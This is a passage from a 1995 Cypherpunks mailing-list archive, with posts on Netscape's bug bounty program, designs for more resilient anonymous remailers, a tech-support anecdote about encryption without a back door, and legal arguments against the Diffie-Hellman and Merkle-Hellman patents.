> b. Unauthorized manipulation of the computer and its associated
> peripheral devices."[8, sec. I B.3]

And I think that this is applicable across the entire product line.

I wonder if this makes me eligible for a bounty for each product where 
there is this Security Bug?? That would be very chivalrous of Netscape
to offer me that. Then maybe I could get a real computer rather than 
this crufty old Mac Plus (a yellow one) and my 2400 baud modem... and 
then, I might just be able to do some virtually real hunting.

Alice de 'nonymous ... (doing a bad impression of Elmer Fudd with 
thoughts of Bugs Bounty in his lil mind.)

...just another one of those...

P.S. And yes I brought this whole issue (tangentially) to the 
attention of netscape.com yesterday afternoon. I think I asked 
whether they were going to have a formal specification and register
their x-mixed-replace with IANA. They haven't gotten to my email
yet, (I think). Or maybe, I'm in the Bulk response group. <shrug>

P.P.S. I give permission to have this propogate freely through 
the cyber-aethyr. All other rights are of course reserved.
C. S. U. M. O. C. L. U. N. E.

_____________________________________________________________________

end quote








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 18 Oct 95 03:05:38 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape whining virus
In-Reply-To: <Pine.3.89.9510180127.A64777-0100000@aix2.uottawa.ca>
Message-ID: <Pine.HPP.3.91.951018103637.23762A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca wrote:

> my little contribution: People download binaries off the net all the
> time. Code gets infected and infects PCs. Big deal.

You don't seem to understand the issue here. Netscape with JAVA is
supposed to become more or less the 'only' program you will run,
a kind of superimposed operative system, or your main shell for
running 'everything' from. Much of 'everything' will be downloaded
at the time of execution. (Microsoft is supposed to be reduced to
one of several 'kernel-suppliers' only.) And 'infected PCs' really
*are* a very big deal in corporate and institutional surroundings.

Mats  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Curtis <jbell@capecod.net>
Date: Wed, 18 Oct 95 08:03:50 PDT
To: "'cypherpunks@toad.com>
Subject: Anonymity: A Modest Proposal
Message-ID: <01BA9D49.9E1723C0@hy35.capecod.net>
MIME-Version: 1.0
Content-Type: text/plain


I think that what you propose could be modeled as an
anonymous remailing distributed process.  If designed
correctly, such a process could be made extremely
difficult to shut down (even for us!)  There are more than 
enough texts written on how to do this correctly; no need
to reinvent the wheel.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Wed, 18 Oct 95 12:23:22 PDT
To: cypherpunks@toad.com
Subject: the beverage you are about to drink
Message-ID: <199510181814.LAA28754@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



All this netscape-bashing reminds me ...

Doesn't anyone think it's sad-funny now that every styrofoam coffee cup has
to be labeled "Warning The Beverage You Are About To Consume Is Hot!!" 

The reality is, we don't want to get burned.  But the coffee is hot. So
you try to have some reasonable compromise since lukewarm coffee is just
not appetizing. 

Marianne
mrm@netcom.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 18 Oct 95 08:18:52 PDT
To: modemac@netcom.com (Modemac)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181515.LAA02260@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> The vulnerability of the remailer system, in my opinion, rests in the
> fact that a remailer is physically located in a certain place.  This
> makes the remailer a target for attacks, as shown by the futile
> efforts (so far) of the so-called "church" of Scientology to silence
> the remailers at anon.penet.fi and xs4all.nl.  

Thus the need to locate them in countries where such supression is not
supported. The vexing part is -- those places seem to have poor
connectivity. 

We need to provide a feed to Freedonia.



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob.Lowry@on-ramp.ior.com (Rob Lowry)
Date: Wed, 18 Oct 95 11:18:01 PDT
To: cypherpunks@toad.com
Subject: Munition Code?
Message-ID: <m0t5d3p-000Rp7C@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok.. not a real brainbuster here.. where can I get a copy of the code that
is classified Munitions, as per the T-Shirts? I don't need the shirt <g>, I
just want to see the code..

Thanks to all who will point me in the right direction..

RobL
------------------|-----------------------------------------------------------
Rob Lowry         |                   
PO Box 288        | 
Rockford Wa 99030 | ral@otc.mhs.compuserve.com           robl@on-ramp.ior.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 18 Oct 95 09:37:16 PDT
To: stevenw@iglou.com (Steven Weller)
Subject: Re: I want to learn! [NOISE]
In-Reply-To: <v01530500acaac8503ff6@[206.86.1.35]>
Message-ID: <199510181636.MAA02026@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Steven Weller writes:
>>>From: VINCENT810@aol.com
>>>Subject: I want to learn!
>>>Can someone please show me the ropes on becomeing a cypherpunk!!!! Thanxs.
>>     Me Too, I'm catching on but some help would help !
>Looks like this is now a proper noun, thanks to AOL.

Anyone else thinking those AOL ads that end "Ma!  Pa done shot up the
'merica on-line agin!" seem to be aimed dead-center for their
demographic?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 11:41:00 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510181839.LAA07648@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> wrote:
> David A Wagner wrote:
> > I do think their ``bug bounty'' system is an improvement -- at least
> > they're showing some concern for security, and beginning to admit
> > that outside review of security-critical code is...well...critical.
>
>   The whole bug bounty thing is an experiment.  We have no idea how
> valuable it will be, but we thought it would be worth trying.  As we
> gain more experience with it, we will probably evolve it.

Mr, Weinstein:

Is your comment about the "Bugs Bounty" program an official comment, that
you have "no idea how valuable" it will be??  Shall I give you a clue,
as to how valuable the discovery of a flawed algorithm might be??

How valuable do you think the ability to download an entire geo-physical
company's 3-D seismic data base is, while some company temp is looking at
a pretty picture of Moo Goo Gai pan, or downloading a recipe for goat-cheese
salad with ginger and macadamia nuts??

Why not admit that the whole Bugs Bounty program was a sham.  Nothing more
than a quickly slapped together public-relations program, that tried to
create an appearance that Netscape had a pro-active business plan.

Is it because there WAS no plan, whatsoever??

Why not admit that you were forced to take action and show that you were
"doing something" following the crack of the Netscape browser that was
supposed to protect sensitive information such as credit-card transactions.
And why not admit that what you did was raid a couple of left over press
kits, and take out some shirts and cups and throw together a damage control
program.  Your so-called "Bugs Bounty" program.

Is it because, a program that says that anyone who reports a "bug" in your
two billion dollar software wouldn't be rewarded -- no, they would
be entered into a draw where they _might_ could get a chance to win a cup
or a shirt??  Or they might receive a $1,000 reward as long as they agree
to a waiver of all their rights, and agree that by reporting the problem to
Netscape and entering the "Bugs Bounty" contest, that their report would:

   "become Netscape's property to be used at Netscape's sole discretion"

Is it because, this simply doesn't pass the giggle test??  And is
demonstrative of such a cavalier internal attitude and approach to
security that it can only be characterized as the grossest of misconduct?

I'm certain that even the marketing people must have burst into peals of
laughter at that one.

Why not admit that Netscape never thought that anyone would find anything at
all??  Why not admit that Netscape thought that they could weasal out of the
Berkeley crack, with a nice little pat on the head to the kids who found it??
Why not admit that not only did Netscape not have an action plan for "bugs"
prior to the "Berkeley crack", but doesn't have any action plan following it.

Why not admit that none of the cocky boys at Netscape had even considered
what would be done if there was an easily exploitable critical design flaw
in the algorithm.

And now that someone took Netscape up on its challenge, and simply said that
the emperor has no clothes, now that someone hasn't just discovered a "bug"
like the "Berkeley crack" but has demonstrated that the Netscape algorithm
is fatally flawed, by posting the exploitation algorithm, now what??

Good God, I asked for clarification from Netscape last Thursday, and Netscape
hasn't bothered to even return my email from almost a week ago.  And, after
posting the exploitation algorithm last week -- on Friday the Thirteenth --
there has been nothing but public relations huff-and-puff.

Clearly, no one performed adequate top-down / bottom-up analysis at Netscape.
And both the internal and external review process were woefully inadequate.

Or to steal a line from Jonathan Swift, in Gulliver's Travels.  Are you,

        "a most ingenious Architect who had contrived a new
         Method for building Houses, by beginning at the Roof,
         and working downwards to the Foundation ..."

and then done nothing else, but issue press-releases to hype and promote
Netscape stock in some self-centered attempt to help out your "friends"
on Wall Street.

>> Still, I do agree that they really oughta be employing true experts
>> to carefully evaluate their system, if they wanna claim anything about
>> its security.
>
>  We are doing that to.  We are paying outside consultants to review
>everything related to security.

Oh yep, I bet you're paying them.

I wonder ... are you paying them in shirts or migs, for their white-wash
review??  And will the report from the external review become "Netscape's
sole property to be used at the sole discretion of Netscape".

Which consultants are you going to get, Mister (unofficial, off the record
speaking personally, not speaking for the Company) Netscape spokesperson??

Who?  AT&T??

AT&T has security people.  The phone company, has very good security
people. And the phone company is supposed to have good quality control,
(ISO-9000 or TQM or something ...) yet AT&T's own internal security
review missed this gaping gash in Netscape browser software.  Even now,
AT&T is using this software internally within its business units and is
ACTIVELY recommending a co-branded version of it to its worldwide customers.

Has Netscape informed AT&T about this??

I'm sure that Netscape has piled their best people into their Falcon and
are busily jetting them around the world signing confidentiality
agreements and retaining every possible outside consultant.  Entering into
agency agreements to keep the lid on the biggest international news story
since the Tylenol or Perrier poisoning.

I wonder who Netscape will get to sign??  Who's going to lend their name,
so that Netscape can say that "we're working closely with Jerry Lewis" or
something similar to solve our security problems.

But Mr.Lewis can't go public with what he knows, can he??  Even if he knows
that Netscape is fatally flawed.  Mr. Lewis will be a Netscape agent at that
point, won't he??  And he'll be bound by the terms of his confidentiality
agreement, even if the company is actively strategically misrepresenting
his confidential report.

Who's going to be left after Netscape hires all these outside consultants??
Who do you hire??  Euro-Mickey, Minny and Donald Duck??

Captain Kangaroo??



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doug@cdsnet.net (Doug Cutrell)
Date: Wed, 18 Oct 95 11:43:32 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <v02120d24acaaefb40aa5@[204.118.244.112]>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:

>If you
>split the message into shadows, you avoid having anyone in this
>position.

Hal Finney <hfinney@shell.portal.com> responds:
>...If the end user is
>responsible for reassembly, then that is tantamount to voluntarily
>agreeing to receive anonymous messages, and that is no problem...
>...And of course anonymous news
>postings via shadows would also have the reassembly problem.

It seems that there could at least be a hierarchy of shadowed newsgroups,
e.g. alt.freespeech.*,  requiring the enduser to use special software to
reassemble actual postings.  This could even be integrated into the
newsreaders, or even at a local newserver level.

To post to these groups, something like the current Mixmaster remailer
network might be used, with extensions for posting "shadows"
to these newsgroups.  So posting would require slightly more enduser
sophistication,and the ability to encrypt.  The client posting software
would hit ITAR, but presumably not the client reassembly software
(newsreader extensions, etc.), since it doesn't need the ability to
encrypt.

Then the newsgroup hierarchy itself would become the target of control
fervor.  Perhaps this could be fought with an emphasis on freedom of
speech and creation of newsgroups for "political expression", e.g.
alt.freespeech.talk.politics, etc.  It's unfortunate, but good soundbites
can be as important as good protocols:  "Freedom of Speech in Cyberspace:
Feds want to eliminate so-called "freespeech newsgroups" on the new
information superhighway..."

I haven't done my homework on protocols for distributing shadows.  Are
there problems with this, other than the obvious one of actually
doing all the work?

Doug Cutrell

_____________________________________________________________
Doug Cutrell                    General Partner
doug@cdsnet.net                 Open Mind
=============================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 18 Oct 95 09:52:37 PDT
To: Modemac <modemac@netcom.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181652.MAA02409@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Modemac writes:
>The vulnerability of the remailer system, in my opinion, rests in the
>fact that a remailer is physically located in a certain place.
...
>Since the prime vulnerability of the remailers rests in their physical
>locations, we have the possibility of physically hiding their
>locations.
...
>The basic idea for this system goes like this:
> 
>     1) A person writes a message and encrypts it with PGP.
>     2) That person then posts his message to the "anonymous messages"
>        newsgroup.
>     3) A remailer scanning the newsgroup picks up the message,
>        decrypts it, strips the headers and makes it anonymous, and
>        sends it to its destination.

This doesn't really help.  The only information that's different in
this approach is in fields that are removed by the remailer before it
goes to the folks who get upset.  I suppose it might improve the
traffic analysis situation somewhat, though, by making it harder
for the analyst to collect all the data.

>To offer further protection for the remailers, a random system could
>be devised to ensure that no one knows exactly which remailer scans a
>particular message at a particular time.
...
>A series of remailers would be used to decrypt anonymous messages.
>A "token" (like the token ring of IBM fame) would be passed back and
>forth between all of the Cryptoclients in the remailer network, so
>that only one remailer would be "active" at any given time.  This
>token would be passed back and forth at random, so no one would know
>exactly which remailer is being used to anonymize a message.

Why bother?  It means all the remailers need to share the same key,
making it impossible to add a new remailer without verifying that it
isn't a CoS/NSA/FBI/whatever tentacle.

A vastly simpler solution would be to have all the remailers scanning
all the time, and only forwarding those messages encrypted with its
key.

>The "token" is the key to this remailing system.  This token would
>include necessary information such as the last message scanned, and
>to coordinate timing among the remailers.  This will work to avoid
>duplication of messages.

This also significantly overestimates the efficiency of news propagation.
Two remailers at distant parts of the net see news messages arrive
in different orders --- often a message received at one point won't
reach the other for up to a day.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 18 Oct 95 08:54:46 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510181353.GAA25545@jobe.shell.portal.com>
Message-ID: <9510181554.AA05280@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal said:
> This has always been the weak link in the remailer system: the last
> remailer in the chain takes the political and legal heat.

A cause of this is that the last remailer is the only agent in a
position to see the message before delivery, so it can be argued that
it should take responsibility for the decision to deliver.  If you
split the message into shadows, you avoid having anyone in this
position.  It can then be argued that nobody should pass along random
noise from unknown parties... you can't solve political problems with
technology, but you can make the politics increasingly absurd.

Well, maybe it wouldn't be considered too absurd.  "Remailing unknown
data is like letting scruffy-looking people put things in your
carry-on luggage."?  Pretty close, if you think speech is a bomb.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 18 Oct 95 09:04:01 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <v02120d02acaa97afa587@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 AM 10/18/95, Hal wrote:

>Now, since I have set it up this way, which was about two years ago, I
>have not received a single complaint about operating the remailer at
>alumni.caltech.edu.  Nobody sends me mail saying "your system is
>accepting objectionable messages."  Instead, all the complaints I get are
>about the Portal remailer (averaging one per week, probably).  People
>complain when they receive a message or newsgroup posting that they find
>objectionable.  They don't care if some system is accepting messages.
>They care about the system which is sending them.
>
>This has always been the weak link in the remailer system: the last
>remailer in the chain takes the political and legal heat.  If there is
>ever a libel or copyright infringement suit, or criminal prosecution,
>against a remailer it will almost certainly be against the last remailer
>in the chain.  Those are the source of the complaints and those are the
>ones which people try to shut down.

        Well, when some folks want to circumvent this kind of last-link
accountability (even if they are the _only_ link), they simply forge their
headers--so why not incorporate that tactic into the remailer net?

        Also, maybe apropos...It seems to me that there should be a way,
within the remailer net, to synthesize forged-path strings with the "Human
ID through insecure channel" remarks you made a few days ago.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 09:13:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181613.MAA01473@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Modemac writes:
> The basic idea for this system goes like this:
>  
>      1) A person writes a message and encrypts it with PGP.
>      2) That person then posts his message to the "anonymous messages"
>         newsgroup.
>      3) A remailer scanning the newsgroup picks up the message,
>         decrypts it, strips the headers and makes it anonymous, and
>         sends it to its destination.

Just for the record, I'll note this is a fairly old idea (cf. the 
Cyphernomicon, news:alt.anonymous, news:alt.anonymous.messages, etc.)

[...]
> A "token" (like the token ring of IBM fame) would be passed back and
> forth between all of the Cryptoclients in the remailer network, so
> that only one remailer would be "active" at any given time.  This
> token would be passed back and forth at random, so no one would know
> exactly which remailer is being used to anonymize a message.

I don't see how this is possible given widespread RFC 822 compliance. 
Any given message must be sent from some particular address. I see two 
main options:

(1) The remailed-message is sent as a single message from a single remailer.
    That remailer is subject to various sorts of pressure if the remailed-
    message offends its recipient.

(2) The remailed-message is sent as several messages from several remailers.
    The recipient's MDA reassembles the fragments into the remailed-message.
    Any or all of those remailers are subject to pressure if the remailed-
    message offends the recipient.

Either way, at least one remailer is subject to pressure for sending a 
specific piece of email.

(If the token is passed around randomly, then it might be more difficult for 
an adversary to predict which remailer will send the _next_ message. However,
adversaries such as Cof$ are interested in assailing remailers that have
_already_ sent messages, due to the content of those messages. They can tell 
which remailer sent _past_ messages, which is what they need.)  

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Wed, 18 Oct 95 12:24:46 PDT
To: cypherpunks@toad.com
Subject: Tales from Tech Support
Message-ID: <199510181924.PAA03259@ncrhub5.attgis.com>
MIME-Version: 1.0
Content-Type: text/plain



This is just one of the incredible "Tales from Tech Support" you can find on 
web page:
http://128.218.7.140/auricular/homepage/tstales/tstales7.html
Enjoy !



SuperMac records a certain number of technical support calls at random, to 
keep tabs on customer satisfaction. By wild "luck", they managed to catch 
the following conversation on tape.

Some poor SuperMac TechSport got a call from some middle level 
official...from the legitimate government of Trinidad. The fellow spoke very 
good English, and fairly calmly described the problem.

It seemed there was a coup attempt in progress at that moment. However, the 
national armoury for that city was kept in the same building as the 
Legislature, and it seems that there was a combination lock on the door to
the armoury. Of the people in the capitol city that day, only the Chief of
the Capitol Guard and the Chief Armourer knew the combination to the lock,
and they had already been killed.

So, this officer of the government of Trinidad continued, the problem is 
this. The combination to the lock is stored in a file on the Macintosh, but 
the file has been encrypted with the SuperMac product called Sentinel. Was
there any chance, he asked, that there was a "back door" to the application,
so they could get the combination, open the armoury door, and defend the
Capitol Building and the legitimately elected government of Trinidad against
the insurgents?

All the while he is asking this in a very calm voice, there is the sound of 
gunfire in the background. The Technical Support guy put the person on hold. 
A phone call to the phone company verified that the origin of the call was
in fact Trinidad. 
Meanwhile, there was this mad scramble to see if anybody knew of any "back 
doors" in the Sentinel program.

As it turned out, Sentinel uses DES to encrypt the files, and there was no 
known back door. The Tech Support fellow told the customer that aside from 
trying to guess the password, there was no way through Sentinel, and that
they'd be better off trying to physically destroy the lock.

The official was very polite, thanked him for the effort, and hung up. That 
night, the legitimate government of Trinidad fell. One of the BBC reporters 
mentioned that the casualties seemed heaviest in the capitol, where for some
reason, there seemed to be little return fire from the government forces.

O.K., so they shouldn't have kept the combination in so precarious a 
fashion. But it does place, "I can't see my Microsoft Mail server" 
complaints in a different sort of perspective, does it not?

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 12:29:39 PDT
To: cypherpunks@toad.com
Subject: Smoking gun invalidates crypto patent
Message-ID: <199510181928.MAA15260@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Finally!  Free public key crypto!

Rumors have floated for years that Diffie-Hellman patent is invalid 
because it was disclosed more than a year prior to the patent 
application. But it was never clear if Diffie or Hellman actually 
disclosed (in the legal sense) the invention. It would seem that Roger 
Schlafly has found a "smoking gun."  Through the legal discovery 
process, Schlafly found a copy of the "New Directions..." paper in the 
procession of an IBM researcher (Mike Matyas) with a stamped "received-
by" date more than a year before the patent filing. This copy did not 
have any confidentiality markings or indications of pre-publication 
status.

Since Diffie-Hellman pre-dates Hellman-Merkle (the Knapsack patent), no 
one can assert any infringement of anything for the use of Diffie-
Hellman - it's free.

The real beauty of the patent system is that a patent holder has to 
defend validity no matter how many times it's challenged. So even if 
Schlafly should fail on a technicality, anyone else, an unlimited number 
of times, can challenge this patent again. (Note: One may question 
whether Stanford lied to the patent office about this. That's fraud.)

The following information is a matter of public record, direct from 
Schlafly's motion for summary judgment, dated October 16th, 1995.

----------------------------

3.    Diffie-Hellman is invalid because of a statutory bar.

3.1.  The Diffie-Hellman patent application was filed on Sept. 6, 1977.  
According to 35 USC 102 (b), the patent is invalid and unenforceable if 
there was a public disclosure prior to Sept. 6, 1976.

3.2.  A research paper by Diffie and Hellman, "New Directions in 
Cryptography", IEEE Transactions on Information Theory, vol.  IT-22, no.  
6, Nov. 1976, was submitted on June 3, 1976.  It discloses the secure 
cipher key generator of the Diffie-Hellman patent.  A copy of the paper 
is Am. Compl. Exhibit. U.

3.3.  A survey paper, "The First Ten Years of Public-Key Cryptography", 
was published by Diffie in Proceedings of the IEEE, vol. 76, no. 5, May 
1988. A copy of the paper is Am. Compl. Exhibit. V.  It states on p. 563 
that the Am. Compl. Exhibit. U paper was publicly distributed in June 
1976 and publicly disclosed at the National Computer Conference, also in 
June 1976.  That conference was open to the public, and well-attended by 
experts in the field.

3.4.  A true and correct copy of the "New Directions" preprint dated 
"August 1976" attached as Exhibit. CA.  It contains a full disclosure of 
the Diffie-Hellman invention.  Schlafly received it from the files of 
Mike Matyas, a cryptographer at IBM, on May 8, 1995.

3.5.  Hellman also lectured on the subject at the 1976 International 
Symposium on Information Theory, Ronneby, Sweden, June 21-24, 1976.

3.6.  The PTO was not informed of these prior art disclosures, as there 
is no record of them in file wrapper.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 18 Oct 95 12:30:12 PDT
To: cypherpunks@toad.com
Subject: Legal argument invalidates Merkle-Hellman
Message-ID: <199510181929.MAA15347@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


More on free public key crypto!

The Hellman-Merkle patent claims to cover the entire notion of public 
key cryptography.  The patent holders say that any scheme which has a 
private key that is computationally infeasible to derive from the public 
key infringes on the Hellman-Merkle patent.  Here is a nice legal 
argument against that position.  It is taken from the public record, 
direct from Roger Schlafly's motion for summary judgment, dated October 
16th, 1995.

Basically, the knapsack algorithm disclosed in the patent does not have 
the claimed property of computational infeasibility, so the patent 
cannot cover any system that does implement the claim.  For example, if 
I submit a patent that claims coverage of all forms of cold-fusion to 
generate power, and disclose an invention that does not work, then those 
general claims are not valid.  Someone who really does invent a workable 
form of cold-fusion gets to make the big patent claims.

----------------------------

4.  Hellman-Merkle is inoperative, hence invalid.

4.1.  The Hellman-Merkle patent discloses a cryptosystem popularly known 
as the "trapdoor Knapsack system", or simply "knapsack".  Ralph Merkle 
is credited with being the principal inventor, and he placed a $100 bet 
that it is secure.  Being "secure" makes it useful for communications or 
authentication.

4.2.  Time Magazine reported on Oct. 25, 1982 that the trapdoor knapsack 
had been broken, i.e., found to be not secure.  Merkle had to pay off 
the $100 bet.  IN patent jargon, the best mode was shown to be 
inoperative.  The article is attached as Exhibit. CB.

4.3.  Apparently unhappy with the article, but not denying his $100 
payoff, Merkle wrote a letter to Time Magazine, published in the Nov. 
15, 1982 issue and attached as Exhibit. CC.  In this letter, he offered 
$1000 to anyone who could break the "multiple iteration knapsack" 
system.  That system was the only alternate mode disclosed in Hellman-
Merkle which was not shown inoperative by the work described in Time.  
Merkle recommended using two or three iterations.

4.4.  Two years later, Merkle had to pay the %1000 to Ernie Brickell who 
broke the Hellman-Merkle trapdoor knapsack scheme with up to 40 
iterations.  The Diffie survey article cited above (AM. Compl. Exhibit. 
V) documents on p. 565-566 the failure of the Hellman-Merkle invention.  
(Note that Exhibit. CI recommends this Diffie article.)  One of 
Brickell's articles on the subject, published as part of the proceedings 
of Crypto '84, is attached as Exhibit. CK.

4.5.  Note that Exhibit. CD, a paper in the Communications of the ACM, a 
leading computer science journal, has an editor's comment that "the 
trapdoor Knapsack systems have been broken".  This is a direct reference 
to Hellman-Merkle being inoperative.

4.6.  The Hellman-Merkle patent is invalid and unenforceable because it 
is inoperative as disclosed.  Claims 1-6 and 14-17 require a quantity 
computationally infeasible to generate from a public key.  Claims 1-3 
and 6-17 require secure communication over an insecure channel.  There 
are no other claims.  As documented above, it turned out to be feasible 
to compute the  secret key from the public key.  It follows that the 
claimed computational infeasibility is not achieved, and the 
communication is not secure.

4.7.  PKP partners RSADSI and Cylink have known the Hellman-Merkle 
invention to be worthless since at least 1985,  and have not used it in 
their commercial products.

4.8.  As further proof of the failure of Hellman-Merkle, PKP is refusing 
to allow it to be used to protect their own trade secrets.  There was a 
motion before the Court which hinged on this issue.  In PKP's Reply 
Memorandum, PKP argues that protecting its trade secrets with Hellman-
Merkle is tantamount to putting them in the public domain.  Schlafly 
interprets this refusal as an admission that Hellman-Merkle is not 
secure.

4.9.  The Hellman-Merkle invention is not useful because of the flaws 
explained above, and therefore fails to satisfy the 35 USC 101 
requirements for patent protection.

4.10.  In the alternative, Schlafly argues that Hellman-Merkle is 
invalid for reasons of nonstatutory subject matter.  See arguments 
pertaining to the RSA patent below.  Hellman-Merkle discloses more 
hardware than RSA, but none of it is novel, and all of the RSA arguments 
apply.  The trapdoor knapsack system is described in Exhibit. CE, a 
Scientific American article by Hellman.  It is readily seen to consist 
purely of mathematical formulas.

4.11.  PKP may argue that the Hellman-Merkle claims are broader than the 
disclosed embodiments, and therefore the patent is valid in spite of the 
failure of the embodiments.  This notion is absurd, and incorrect as a 
matter of law.  Abstract concepts and ideas cannot be patented at all, 
and certainly not with an inoperative disclosure.

4.12.  In addition, there is prior art on those abstract concepts.  See 
the conference abstracts submitted by Diffie (Exhibit. CG) and Hellman 
(Exhibit. CH).  These were published in June 1976.

4.13.  In the Hellman-Merkle file history, the inventors argue that they 
are entitled to broad patent claims because earlier embodiments of 
public key cryptosystems in the prior art were impractical.  If their 
invention is impractical, then it is no better than the prior art they 
criticized.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 09:39:41 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <9510181554.AA05280@toad.com>
Message-ID: <199510181639.MAA01815@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Eli Brandt writes:
> A cause of this is that the last remailer is the only agent in a
> position to see the message before delivery, so it can be argued that
> it should take responsibility for the decision to deliver.  If you
> split the message into shadows, you avoid having anyone in this
> position.  It can then be argued that nobody should pass along random
> noise from unknown parties... you can't solve political problems with
> technology, but you can make the politics increasingly absurd.

As I mentioned in a reply to Modemac I just sent, the recipient's MDA in this
scheme reassembles the shadows/fragments into the intended message. So it
would only be possible to send anonymous mail to recipients who have Message
Gluing Agents on their accounts. 

I posit that such people are likely to be anonymity-friendly, and thus 
unlikely to complain vociferously about any anonymous mail they receive.
This protocol generally could not be used to send anonymous mail to public 
fora -- mailing lists, newsgroups, etc. -- except some freewheeling places
like cypherpunks which don't object to conventional anonymized mail anyway.

However, I foresee a slight possibility that a split delivery scheme like
this could fall into favor in some circles as a compromise <ahem> "solution".
The requirement that the recipient take an active role in accepting anonymous
mail could reduce the traditional spam/harassment complaints to a minimal
level.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 12:46:03 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510181839.LAA07648@jobe.shell.portal.com>
Message-ID: <199510181940.MAA10771@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Would you please stop posting your shit to this list? I'd
rather not add all anonymous posters to my killfile, but maybe it is
necessary.
	At least get an account on alpha.c2.org so I can killfile you
and no one else, please. Thank you. (http://alpha.c2.org/)

> 
> Alice de 'nonymous ...
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 18 Oct 95 12:52:37 PDT
To: sameer@c2.org
Subject: Re: Postscript in Netscape
Message-ID: <9510181948.AA08965@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: sameer <sameer@c2.org>
> 
> 	In any case, it might be wise for Jeff to get a non-netscape
> account to do his cypherpunks posting from, so as to avoid
> confusion. (ObPlug: Community ConneXion offers mailboxes for just
> $5/month -- shell accounts for $7.50 ;-)

Oh that would be silly now wouldn't it?  If Jeff wants another account
